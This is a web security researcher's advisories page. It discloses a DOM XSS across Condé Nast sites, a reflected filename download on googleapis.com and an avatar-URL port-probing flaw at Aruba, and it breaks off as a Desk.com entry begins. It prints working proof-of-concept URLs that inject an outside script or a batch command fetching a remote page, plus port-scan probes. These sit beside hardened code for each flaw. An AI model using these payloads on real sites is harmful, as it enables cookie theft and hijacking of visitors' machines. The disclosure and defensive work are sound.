David Sopas – Web Security Researcher

Advisories

16/09/15 Advisories

DOM XSS in all Condé Nast sites network

For those who don’t know Condé Nast:

Condé Nast, a division of Advance Publications, is a mass media company headquartered at One World Trade Center in New York City. The company attracts more than 164 million consumers across its 20 print and digital media brands: Allure, Architectural Digest, Ars Technica, Bon Appétit, Brides, Condé Nast Traveler, Details, Epicurious, Glamour, Golf Digest, Golf World, GQ, Lucky, The New Yorker, Self, Teen Vogue, Vanity Fair, Vogue, W and Wired.

A DOM XSS vulnerability in a specific ads page on newyorker.com led me to discover that all of their network websites were vulnerable to code injected through the URL.

The affected file was displayad.html in the ads directory:

<script type="text/javascript">
document.write('<script type="text/javascript" src="' + (location.search.split('req=')[1] || '') + '"></scr'+'ipt>');
</script>

The value taken from location.search.split is never validated or escaped, so the “req” parameter could be set to any script URL we wished.

Proof-of-Concept:

http://www.newyorker.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js

Other sites on the network:

http://www.bonappetit.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.brides.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.wired.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.arstechnica.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.newyorker.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.style.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.vanityfair.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.architecturaldigest.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.gq.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.gourmet.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.glamour.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js

Keep in mind that these sites bring in millions of users every day, and this vulnerability in the wrong hands would be very dangerous.
A malicious user could also:

  • Access other sites inside another client’s private intranet.
  • Steal another client’s cookie(s).
  • Modify another client’s cookie(s).
  • Steal another client’s submitted form data.
  • Modify another client’s submitted form data (before it reaches the server).
  • Submit a form to your application on the user’s behalf which modifies passwords or other application data.

This was fixed by the Condé Nast security team, which kept me updated at every step, showing that it’s a company that cares about security and its clients. Hope they can keep up the good work.
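A hardened version of the ad loader, written here as an added example and not Condé Nast’s actual fix: the “req” value is parsed with URLSearchParams, resolved against the page origin, and only loaded when it is an https URL on an allow-listed ad host. The allow-listed host and the base origin are assumptions for illustration.

```javascript
// Allow-listed ad host: an assumption for this example, not a real value.
const ALLOWED_AD_HOSTS = new Set(['ads.example.com']);

// Returns the script URL to load, or null if the parameter must be rejected.
function resolveAdScriptUrl(search, allowedHosts, baseOrigin) {
  // URLSearchParams decodes the value properly and avoids the substring
  // match of split('req='), which would also fire on e.g. "?xreq=".
  const req = new URLSearchParams(search).get('req');
  if (!req) return null;
  let url;
  try {
    url = new URL(req, baseOrigin);   // relative values resolve against the page
  } catch (e) {
    return null;                      // unparsable value
  }
  if (url.protocol !== 'https:') return null;       // blocks javascript:, data:, http:
  if (!allowedHosts.has(url.hostname)) return null; // blocks third-party hosts
  return url.href;
}

// Loads the script via DOM APIs instead of building HTML with document.write.
// Takes the document as a parameter so the helper can be unit-tested.
function loadAdScript(doc, search, allowedHosts, baseOrigin) {
  const src = resolveAdScriptUrl(search, allowedHosts, baseOrigin);
  if (src === null) return false;
  const s = doc.createElement('script');
  s.src = src;                        // property assignment, no string splicing
  doc.head.appendChild(s);
  return true;
}
```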

Timeline:
08-09-2015 Asked for a security contact
09-09-2015 First contact with the head of security of Condé Nast
10-09-2015 Sent the report
11-09-2015 Update received that they were clearing cache
14-09-2015 Problem solved
16-09-2015 Full disclosure

10/09/15 Advisories

Google Reflected Filename Download

I found a critical issue on Google that can be used by malicious users to hijack victims’ computers, using a Google domain as the platform and source of trust.

I came across this security issue because I detected, using Google Inspector, a JSON request made to the following URL:

https://www.googleapis.com/customsearch/v1?callback=jQuery17109823856276925653_1439708781699&key=AIzaSyCMGfdDaSfjqv5zYoS0mTJnOT3e9MURWkU&cx=014141993897103097974%3A46gdqg1e99k&q=xss&num=5&_=1439709781835

After confirming that the callback parameter was reflected in the response, I tried the following GET request:

https://www.googleapis.com/customsearch/v1?callback=calc&key=&cx=&q=xss&num=5

Which returns the following JSON information:

// API callback
calc({
  "error": {
    "errors": [
      {
        "domain": "usageLimits",
        "reason": "keyInvalid",
        "message": "Bad Request"
      }
    ],
    "code": 400,
    "message": "Bad Request"
  }
}
);

It returns HTTP status code 200 even though the JSON body says it is an error (?). In this case the callback parameter only allows a command without spaces, so in the following proof-of-concept I could only execute calc on Windows.

But I wanted a better and more exploitable proof-of-concept, so I tried the query parameter, “q”:

https://www.googleapis.com/customsearch/v1?callback=jQuery17109823856276925653_1439708781699&key=AIzaSyCMGfdDaSfjqv5zYoS0mTJnOT3e9MURWkU&cx=014141993897103097974%3A46gdqg1e99k&q=%22%7C%7Cstart+chrome+davidsopas.com%2Fpoc%2Fmalware.htm%7C%7C&num=5

Which returned:

"title": "Google Custom Search - \"||start chrome davidsopas.com/poc/malware.htm||",
"searchTerms": "\"||start chrome davidsopas.com/poc/malware.htm||",

The payload is reflected. Since I couldn’t control the filename and force a download, I needed to use the HTML5 vector supported by the following browsers:

  • Chrome
  • Opera
  • Android Browser
  • Chrome for Android
  • Firefox

Online proof-of-concept (downloads a batch file that opens a new Chrome window with a URL; in my PoC it is just text):

[screenshots: google_rfd3, google_rfd2]

This works on mostly all Microsoft Windows versions. It can also be used on Linux and OS X, but it needs more user interaction. For a multi-platform attack a malicious user could create a .htm file instead of a .bat file, with the HTML file itself being malicious. This might be an alternative attack method that works on all operating systems.

So in my proof-of-concept I was able to open a new Chrome window with a page that simulates malware (it’s just text).

A malicious user could:

  1. Launch a malicious campaign with a specially crafted page presenting Google offers, similar to my proof-of-concept
  2. The victim downloads the file, thinking it comes from a trusted domain (googleapis.com)
  3. The malicious user gains control over the victim’s machine

How to fix this issue?
Google has already fixed most issues of this kind by using the HTTP header Content-disposition: attachment; filename="f.txt", which forces the download to be named f.txt every time. But this time they decided not to fix it, because they say it needs too much user interaction.
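As an added example (not Google’s code), here is how a JSONP endpoint can build its reply so that a reflected value cannot become a runnable download: the callback name is restricted to a strict identifier charset, and the fixed Content-Disposition filename from the text forces every save to f.txt. The nosniff header and the exact regex are assumptions beyond the post.

```javascript
// Strict callback charset: letters, digits, "_", "$" and "." only, so
// shell metacharacters such as "||" can never reach the response body
// through the callback name.
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$.]{0,63}$/;

// Fixed download name: whatever the URL contains, a saved copy is f.txt,
// which Windows will not treat as a batch file. Browsers still execute the
// body when it is loaded via <script src>, so JSONP keeps working.
const RFD_HEADERS = {
  'Content-Disposition': 'attachment; filename="f.txt"',
  'X-Content-Type-Options': 'nosniff',   // assumption: also stop MIME sniffing
};

function buildJsonpResponse(callback, payload) {
  if (!CALLBACK_RE.test(callback)) {
    return {
      status: 400,
      headers: { 'Content-Type': 'application/json; charset=utf-8', ...RFD_HEADERS },
      body: JSON.stringify({ error: 'invalid callback' }),
    };
  }
  // JSON.stringify escapes quotes and control characters in reflected values
  // such as the search term "q". Note this alone does not defuse RFD (the
  // post shows cmd.exe still runs the escaped line); the fixed filename does.
  const json = JSON.stringify(payload)
    .replace(/\u2028/g, '\\u2028')   // keep the body valid JavaScript
    .replace(/\u2029/g, '\\u2029');
  return {
    status: 200,
    headers: { 'Content-Type': 'application/javascript; charset=utf-8', ...RFD_HEADERS },
    body: `// API callback\n${callback}(${json});`,
  };
}
```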

08/08/15 Advisories

ArubaNetworks Avatar Image XSPA

I found out that it was possible to run an XSPA (Cross Site Port Attack) using the Avatar URL option on any registered community profile.
XSPA allows attackers to abuse functionality available in most web applications to port scan intranet and external Internet-facing servers.
An application is vulnerable to Cross Site Port Attacks if it processes user-supplied URLs and does not verify/sanitize the backend response received from the server.

Proof-of-concept:
In this type of attack I always use the Nmap test machine, scanme.nmap.org, to check which ports are open on the server.
Using Nmap on my own system I tested 3 ports on scanme.nmap.org:

80/tcp open http
81/tcp closed http
443/tcp closed https

I then entered the following external URL in my Avatar web option (https://community.arubanetworks.com/t5/user/myprofilepage/tab/user-icons%3Aexternal):
http://scanme.nmap.org:80/

No server error.

I modified it to:
http://scanme.nmap.org:81/

And after to:
http://scanme.nmap.org:443/

The following errors were returned:

http://scanme.nmap.org:81 – GET http://scanme.nmap.org:81/ net::ERR_CONNECTION_REFUSED

http://scanme.nmap.org:443 – GET http://scanme.nmap.org:443/ net::ERR_CONNECTION_REFUSED

You can even check that the port is stored in the avatar HTML:

<img id="display" class="lia-user-avatar-message" title="dsopas" src="http://scanme.nmap.org:443/" alt="dsopas" />


The Aruba security team has already fixed this issue, so I decided to share it with you guys.
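Server-side validation of a user-supplied avatar URL before the application stores or fetches it, as an added example that is not Aruba’s fix: it rejects non-http(s) schemes, any explicit port (so only the scheme defaults 80/443 remain and a profile field cannot double as a port probe), embedded credentials, loopback names and IP literals. Rejecting every IP literal is a simplification assumed here; a real deployment also resolves the hostname and re-checks the resolved address.

```javascript
// Returns { ok, reason, url }. Only http/https on the default port, with a
// DNS hostname, is accepted.
function validateAvatarUrl(raw) {
  let u;
  try {
    u = new URL(raw);
  } catch (e) {
    return { ok: false, reason: 'unparsable' };
  }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') {
    return { ok: false, reason: 'scheme' };
  }
  // The WHATWG URL parser clears .port when it equals the scheme default,
  // so "http://host:80/" passes here while ":81" and ":443" on http do not.
  if (u.port !== '') return { ok: false, reason: 'explicit-port' };
  if (u.username || u.password) return { ok: false, reason: 'credentials' };
  const host = u.hostname.replace(/^\[|\]$/g, '');   // strip IPv6 brackets
  if (host === 'localhost' || host.endsWith('.localhost')) {
    return { ok: false, reason: 'loopback' };
  }
  // IPv4 dotted quad or anything containing ":" (IPv6) is an IP literal.
  if (/^\d{1,3}(\.\d{1,3}){3}$/.test(host) || host.includes(':')) {
    return { ok: false, reason: 'ip-literal' };
  }
  return { ok: true, reason: '', url: u.href };
}
```

Whatever the later fetch returns, the profile page should show only a generic status and never echo the backend error text.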

03/08/15 Advisories

Desk.com Reflected Filename Download

Who is Desk.com?

Salesforce Desk.com help desk software offers small businesses an all-in-one customer service software solution that will help keep customers happy and loyal. Desk.com can be set up in just hours, and provides multi-channel support, including phone, email, self-help pages, and social media. Not only will this innovative help desk software let your agents more easily serve customers, your small business will have the insights needed to build better products and make smarter, growth-driving decisions.

– in http://www.salesforce.com/desk/overview/

Who uses Desk.com?
